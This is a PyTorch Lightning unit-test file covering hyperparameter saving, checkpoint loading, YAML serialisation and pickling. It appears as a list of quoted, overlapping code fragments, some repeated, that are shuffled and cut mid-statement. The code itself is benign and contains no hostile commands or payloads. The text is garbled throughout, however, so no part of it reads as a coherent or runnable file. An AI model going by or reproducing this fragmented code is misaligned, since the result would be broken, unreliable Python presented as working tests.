'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel): def", "class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can take an", "{'loss': loss, 'log': {'train_loss': loss}} def configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02)", "standard test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def", "that model loads correctly model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg ==", "'pickle_me' removed from hparams because it cannot be pickled\"): trainer.fit(model)", "you may not use this file except in compliance with", "cls(arg1=1, arg2=2) assert 'local_var' not in model.hparams assert model.hparams['arg1'] ==", "cls() trainer = Trainer( max_epochs=1, default_root_dir=tmpdir, ) train_loader = DataLoader(TrialMNIST(os.getcwd(),", "# intentionally named obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def", "pytorch_lightning.utilities import AttributeDict, is_picklable from tests.base import EvalModelTemplate, TrialMNIST, BoringModel", "and init in the super class \"\"\" def __init__(self, *args,", "'pickle_me' not in model.hparams def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001,", "def configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel, NoArgsSubClassEvalModel, ])", "\"\"\" with pytest.raises(ValueError): _ = cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir,", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "\"\"\" A 
model that has an attribute that cannot be", "cannot be pickled\"): trainer.fit(model) assert 'pickle_me' not in model.hparams def", "model = LocalModel(test_arg=14, test_arg2=90) # test proper property assignments assert", "train trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) # make sure", "def test_implicit_args_hparams(tmpdir): \"\"\" Tests that a model can take regular", "define model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg',", "test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir,", "raw_checkpoint['hparams_type'] = 'Namespace' raw_checkpoint[past_key]['batch_size'] = -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save", "assert isinstance(a, torch.nn.Module) def test_outside(): a = MyModule() _ =", "self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def __init__(self, arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2)", "'.ckpt' in x] assert raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path =", "model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg') model", "78 return raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls): #", "isinstance(a, torch.nn.Module) def test_outside(): a = MyModule() _ = a.hparams", "functional as F from torch.utils.data import DataLoader from pytorch_lightning import", "test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models that do not tae any argument", "'non_exist_kwarg' not in model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams): super().__init__()", "RuntimeParamChangeModelAssign(BoringModel): def __init__(self, **kwargs): super().__init__() self.hparams = kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving,", "EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def test_collect_init_arguments(tmpdir, cls):", "\"\"\" # model = cls(config) # # # no matter", "self.save_hyperparameters('test_arg', 'test_arg2') model = LocalModel(test_arg=14, test_arg2=90) # run standard test", "_raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size']", "config specific tests assert model2.hparams.test_arg == 14 assert model2.hparams.mylist[0] ==", "if cls is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything')))", "isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) if isinstance(model, DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param']", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "Tests that a model can take an object \"\"\" def", "passed into the constructor \"\"\" extra_args = {} if cls", "import Namespace import cloudpickle import pytest import torch from fsspec.implementations.local", 
"LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that", "class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this model should accept hparams and", "test_arg2): super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90) # run standard", "assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that model loads correctly", "x] assert raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path)", "in the super class \"\"\" def __init__(self, *args, **kwargs): super().__init__(*args,", "args and assign \"\"\" # define model class LocalModel(EvalModelTemplate): def", "try_overwrite=False): \"\"\" Tests for the existence of an arg 'test_arg=14'", "# run standard test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel,", "intentionally here at the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast,", "file except in compliance with the License. # You may", "(AnotherArgModel, dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls, config):", "'log': {'train_loss': loss}} def test_step(self, batch, batch_nb): x, y =", "AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can take an object", "has the _auto_collect_arguments() call at the end. \"\"\" def __init__(self,", "trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) # make sure the", "can take implicit args and assign \"\"\" # define model", "cls(hparams=Namespace(test_arg=14)) # run standard test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\",", "change allowed\"\"\" model = cls(running_arg=123) assert model.hparams.running_arg == 123 model.hparams.running_arg", "a = MyModule() assert isinstance(a, torch.nn.Module) def test_outside(): a =", "registered in class init return raw_checkpoint_path # ------------------------- # SPECIFIC", "arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls, config): \"\"\" Test fail on", "pickle.loads(pkl) pkl = cloudpickle.dumps(ad) assert ad == pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate):", "pickle_me=(lambda x: x + 1), **kwargs): super().__init__(**kwargs) assert not is_picklable(pickle_me)", "arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel, dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')), ]) def", "__init__(self, **kwargs): super().__init__() self.hparams = kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def", "be pickled\"): trainer.fit(model) assert 'pickle_me' not in model.hparams def test_hparams_save_yaml(tmpdir):", "raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that model loads correctly model2", "self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(),", "@pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir, cls): # init model model", "# # # verify that the checkpoint saved the correct", "language governing permissions 
and # limitations under the License. import", "torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 #", "model.hparams['arg2'] == 2 # @pytest.mark.parametrize(\"cls,config\", [ # (SaveHparamsModel, Namespace(my_arg=42)), #", "def test_args(tmpdir): \"\"\" Test for inheritance: super class takes positional", "def __init__(self): super().__init__() self.l1 = torch.nn.Linear(28 * 28, 10) def", "y) return {'loss': loss, 'log': {'train_loss': loss}} def configure_optimizers(self): return", "assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) == hparams", "**kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [ EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel,", "'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs): super().__init__() self.save_hyperparameters() class", "constructor \"\"\" extra_args = {} if cls is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss())", "verify that we can overwrite the property model3 = cls.load_from_checkpoint(raw_checkpoint_path,", "-17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back the checkpoint torch.save(raw_checkpoint, raw_checkpoint_path)", "= hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this model should accept", "_raw_checkpoint_path(trainer) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99) assert 'non_exist_kwarg' not in model.hparams", "42 class AnotherArgModel(EvalModelTemplate): def __init__(self, arg1): super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate):", "This model has the _auto_collect_arguments() call at the end. \"\"\"", "KIND, either express or implied. 
# See the License for", "model.hparams.my_arg == 42 # # # verify that the checkpoint", "assert model.hparams.my_arg == 42 # # # verify that the", "sure the raw checkpoint saved the properties raw_checkpoint_path = _raw_checkpoint_path(trainer)", "assert model2.hparams.mylist[0] == 15.4 def test_explicit_args_hparams(tmpdir): \"\"\" Tests that a", "the properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY", "# model = cls.load_from_checkpoint(raw_checkpoint_path) # assert model.hparams.my_arg == 42 class", "model = LocalModel() assert model.hparams.batch_size == 15 # verify that", "def __init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters() model = LocalModel() assert model.hparams.batch_size", "assert model2.hparams.test_arg == 14 assert model2.hparams.mylist[0] == 15.4 def test_explicit_args_hparams(tmpdir):", "**kwargs): super().__init__(*args, **kwargs) def test_args(tmpdir): \"\"\" Test for inheritance: super", "os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') == 123 class", "trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) with pytest.raises(TypeError,", "# # # verify that model loads correctly # raw_checkpoint_path", "(the \"License\"); # you may not use this file except", "model2.hparams.test_arg == 14 assert model2.hparams.mylist[0] == 15.4 def test_explicit_args_hparams(tmpdir): \"\"\"", "a model can take regular args and assign \"\"\" #", "'test_arg2' not in model.hparams # test_arg2 is not registered in", "assigned # assert model.hparams.my_arg == 42 # # # verify", "is not registered in class init return raw_checkpoint_path # -------------------------", "self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90) # run standard test suite", "raw_checkpoint = torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] = 'Namespace' raw_checkpoint[past_key]['batch_size']", "are always nn.Module a = MyModule() assert isinstance(a, torch.nn.Module) def", "= cls() trainer = Trainer( max_epochs=1, default_root_dir=tmpdir, ) train_loader =", "raw_checkpoint_path = _raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\) got an unexpected keyword", "Container) # config specific tests assert model2.hparams.test_arg == 14 assert", "assert model.hparams.test_arg2 == 120 def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that a", "= Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, ) trainer.fit(model) path_yaml", "A: def test(self): a = MyModule() _ = a.hparams def", "def test_collect_init_arguments(tmpdir, cls): \"\"\" Test that the model automatically saves", "model = cls(running_arg=123) assert model.hparams.running_arg == 123 model.hparams.running_arg = -1", "in model.hparams def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123,", "# Copyright The PyTorch Lightning team. 
# # Licensed under", "from torch.nn import functional as F from torch.utils.data import DataLoader", "def __init__(self, hparams): super().__init__() self._hparams = None # pretend EvalModelTemplate", "# # Unless required by applicable law or agreed to", "torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] = 'Namespace' raw_checkpoint[past_key]['batch_size'] = -17", "can take an object with explicit setter \"\"\" def __init__(self,", "can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # make sure", "hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert", "that cannot be pickled. \"\"\" def __init__(self, foo='bar', pickle_me=(lambda x:", "train=True, download=True), batch_size=32) trainer.fit(model, train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True),", "we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # make", "verify that model loads correctly model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size", "A model that has unconventional names for \"self\", \"*args\" and", "model.hparams.batch_size == 15 # verify that the checkpoint saved the", "and \"**kwargs\". \"\"\" def __init__(obj, *more_args, other_arg=300, **more_kwargs): # intentionally", "\"\"\"Test that the model takes only valid class arguments.\"\"\" class", "implied. # See the License for the specific language governing", "__init__(self, my_path, any_param=123): super().__init__() self.save_hyperparameters() def test_model_with_fsspec_as_parameter(tmpdir): model = UnsafeParamModel(LocalFileSystem(tmpdir))", "DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args) assert model.hparams.batch_size == 32 model", "super().__init__(**kwargs) assert not is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel()", "UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that has an attribute that cannot", "not in model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams): super().__init__() self._hparams", "test_implicit_args_hparams(tmpdir): \"\"\" Tests that a model can take regular args", "model.hparams.test_arg == 14 assert 'test_arg2' not in model.hparams # test_arg2", "a model can take an object with explicit setter \"\"\"", "automatically saves the arguments passed into the constructor \"\"\" extra_args", "# config specific tests assert model2.hparams.test_arg == 14 assert model2.hparams.mylist[0]", "did not call self.save_hyperparameters() self.hparams = hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\"", "unsupported config type. 
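# Illustrative sketch, not part of the original suite: the checkpoint layout
# the helpers above rely on. Collected hparams live in the checkpoint dict
# under LightningModule.CHECKPOINT_HYPER_PARAMS_KEY, so they can be inspected
# without re-instantiating the model. `some_ckpt_path` is a hypothetical path.
def _inspect_checkpoint_hparams(some_ckpt_path):
    raw_checkpoint = torch.load(some_ckpt_path)
    hparams = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]
    return dict(hparams)  # e.g. {'test_arg': 14, 'batch_size': 32, ...}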
\"\"\" with pytest.raises(ValueError): _ = cls(**config) @pytest.mark.parametrize(\"past_key\",", "14 # verify that model loads correctly model2 = cls.load_from_checkpoint(raw_checkpoint_path)", "assert raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return", "model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams, Container) # config specific tests", "assert model.hparams.test_arg == 14 assert 'test_arg2' not in model.hparams #", "[ # (SaveHparamsModel, Namespace(my_arg=42)), # (SaveHparamsModel, dict(my_arg=42)), # (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))),", "define model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg')", "F from torch.utils.data import DataLoader from pytorch_lightning import Trainer, LightningModule", "test(self): a = MyModule() _ = a.hparams def test2(self): test_outside()", "model = EvalModelTemplate() # verify we can train trainer =", "model.hparams.running_arg == 123 model.hparams.running_arg = -1 assert model.hparams.running_arg == -1", "42 trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, )", "AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def test_collect_init_arguments(tmpdir, cls): \"\"\" Test that", "SimpleNoArgsModel(LightningModule): def __init__(self): super().__init__() self.l1 = torch.nn.Linear(28 * 28, 10)", "OtherArgsModel(EvalModelTemplate): def __init__(self, arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [", "== pickle.loads(pkl) pkl = cloudpickle.dumps(ad) assert ad == pickle.loads(pkl) class", "# verify that model loads correctly # raw_checkpoint_path = _raw_checkpoint_path(trainer)", "**kwargs) # this is intentionally here at the end class", "loads correctly model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg == 14 assert", "14 # verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1,", "from torch.utils.data import DataLoader from pytorch_lightning import Trainer, LightningModule from", "179 if isinstance(model, SubClassEvalModel): assert model.hparams.subclass_arg == 1200 if isinstance(model,", "assert isinstance(model2.hparams, Container) # config specific tests assert model2.hparams.test_arg ==", "_raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\) got an unexpected keyword argument 'test'\"):", "cls): \"\"\"Test models that do not tae any argument in", "self.save_hyperparameters() model = LocalModel() assert model.hparams.batch_size == 15 # verify", "existence of an arg 'test_arg=14' \"\"\" hparam_type = type(model.hparams) #", "raw_checkpoint[past_key]['batch_size'] = -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back the checkpoint", "trainer = Trainer(default_root_dir=tmpdir, max_steps=1) with pytest.warns(UserWarning, match=\"attribute 'pickle_me' removed from", "Unless required by applicable law or agreed to in writing,", "test_arg2=90) # test proper property assignments assert model.hparams.test_arg == 14", "train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir):", "= 
cls(**extra_args) assert model.hparams.batch_size == 32 model = cls(batch_size=179, **extra_args)", "LocalModel() assert model.hparams.batch_size == 15 # verify that the checkpoint", "= DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32) trainer.fit(model, train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(),", "99 def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths =", "the specific language governing permissions and # limitations under the", "train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32) trainer.fit(model, train_loader) test_loader =", "test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test", "the arguments passed into the constructor \"\"\" extra_args = {}", "verify that we can overwrite whatever we want model =", "'local_var' not in model.hparams assert model.hparams['arg1'] == 'overwritten' assert model.hparams['arg2']", "super().__init__() self.hparams = hparams # ------------------------- # STANDARD TESTS #", "values trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # verify that we", "== 99 def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths", "assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams", "== 42 class AnotherArgModel(EvalModelTemplate): def __init__(self, arg1): super().__init__() self.save_hyperparameters(arg1) class", "def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90)", "forward(self): ... 
# make sure PL modules are always nn.Module", "model.hparams['arg1'] == 'overwritten' assert model.hparams['arg2'] == 2 # @pytest.mark.parametrize(\"cls,config\", [", "== -17 def test_hparams_pickle(tmpdir): ad = AttributeDict({'key1': 1, 'key2': 'abc'})", "load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml,", "a model can take an object \"\"\" def __init__(self, hparams):", "MyModule() _ = a.hparams class A: def test(self): a =", "= -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back the checkpoint torch.save(raw_checkpoint,", "# init model model = cls(hparams=Namespace(test_arg=14)) # run standard test", "# make sure the raw checkpoint saved the properties raw_checkpoint_path", "super().__init__() self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14, test_arg2=90) # test proper property", "'anything' # verify that we can overwrite whatever we want", "self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model that has unconventional names", "= Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) # make sure the raw", "OmegaConf, Container from torch.nn import functional as F from torch.utils.data", "isinstance(model2.hparams, hparam_type) if try_overwrite: # verify that we can overwrite", "NoArgsSubClassEvalModel(EvalModelTemplate): def __init__(self): super().__init__() class SimpleNoArgsModel(LightningModule): def __init__(self): super().__init__() self.l1", "load_hparams_from_yaml from pytorch_lightning.utilities import AttributeDict, is_picklable from tests.base import EvalModelTemplate,", "that a model can take an object \"\"\" def __init__(self,", "varargs. 
\"\"\" hparams = dict(test=1) model = SubClassVarArgs(hparams) trainer =", "def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [", "class OtherArgsModel(EvalModelTemplate): def __init__(self, arg1, arg2): super().__init__() self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\",", "def test_explicit_args_hparams(tmpdir): \"\"\" Tests that a model can take implicit", "loads correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg == 14", "assignments assert model.hparams.test_arg == 14 # verify we can train", "verify that model loads correctly model = cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size", "def test2(self): test_outside() test_outside() A().test2() A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss =", "assert 'pickle_me' not in model.hparams def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32,", "== hparams save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams))", "trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # verify that we can", "class AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters()", "# pretend EvalModelTemplate did not call self.save_hyperparameters() self.hparams = hparams", "------------------------- # STANDARD TESTS # ------------------------- def _run_standard_hparams_test(tmpdir, model, cls,", "= Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model) # make sure the raw", "]) def test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models that do not tae", "@pytest.mark.parametrize(\"cls\", [ EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel, DictConfSubClassEvalModel, ]) def", "model.hparams.abc == 42 trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2,", "'key2': 'abc'}) pkl = pickle.dumps(ad) assert ad == pickle.loads(pkl) pkl", "Tests that a model can take regular args and assign", "STANDARD TESTS # ------------------------- def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False): \"\"\"", "------------------------- # SPECIFIC TESTS # ------------------------- def test_class_nesting(): class MyModule(LightningModule):", "EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size == -17 def test_hparams_pickle(tmpdir): ad = AttributeDict({'key1':", "tests assert model2.hparams.test_arg == 14 assert model2.hparams.mylist[0] == 15.4 def", "loss = F.cross_entropy(self(x), y) return {'loss': loss, 'log': {'train_loss': loss}}", "DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32) trainer.fit(model, train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False,", "= DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that", "not is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel() trainer =", 
"{'loss': loss, 'log': {'train_loss': loss}} def test_step(self, batch, batch_nb): x,", "SimpleNoArgsModel, NoArgsSubClassEvalModel, ]) def test_model_nohparams_train_test(tmpdir, cls): \"\"\"Test models that do", "torch.save(raw_checkpoint, raw_checkpoint_path) # verify that model loads correctly model2 =", "config): \"\"\" Test fail on passing unsupported config type. \"\"\"", "from omegaconf import OmegaConf, Container from torch.nn import functional as", "model3.hparams.test_arg == 78 return raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir,", "set arg1 = 'overwritten' local_var = 1234 super().__init__(*args, **kwargs) #", "class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg', 'test_arg2') model", "cloudpickle.dumps(ad) assert ad == pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model", "**kwargs): super().__init__() self.hparams = kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir,", "init in the super class \"\"\" def __init__(self, *args, **kwargs):", "runtime change allowed\"\"\" model = cls(running_arg=123) assert model.hparams.running_arg == 123", "isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param'] == 'anything' # verify that we", "overfit_batches=0.5) # trainer.fit(model) # # # verify that model loads", "assert model.hparams.batch_size == 15 # verify that the checkpoint saved", "= 1234 super().__init__(*args, **kwargs) # this is intentionally here at", "names for \"self\", \"*args\" and \"**kwargs\". \"\"\" def __init__(obj, *more_args,", "@pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_omega_conf_hparams(tmpdir, cls): # init model conf", "fsspec.implementations.local import LocalFileSystem from omegaconf import OmegaConf, Container from torch.nn", "Container) # run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model,", "that we can overwrite whatever we want raw_checkpoint_path = _raw_checkpoint_path(trainer)", "cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams, Container) # config specific tests assert model2.hparams.test_arg", ") train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32) trainer.fit(model, train_loader) test_loader", "You may obtain a copy of the License at #", "that we can overwrite the property model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78)", "*args, **kwargs): self.argument1 = arg1 # arg2 intentionally not set", "model, LocalModel) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120) # config specific tests", "from pytorch_lightning.utilities import AttributeDict, is_picklable from tests.base import EvalModelTemplate, TrialMNIST,", "in class init return raw_checkpoint_path # ------------------------- # SPECIFIC TESTS", "A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss = torch.nn.CrossEntropyLoss() def __init__(self, *args, subclass_arg=1200,", "== 123 model.hparams.running_arg = -1 assert model.hparams.running_arg == -1 model.hparams", "cloudpickle import pytest import torch from fsspec.implementations.local import LocalFileSystem from", "raw_checkpoint_path) return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): 
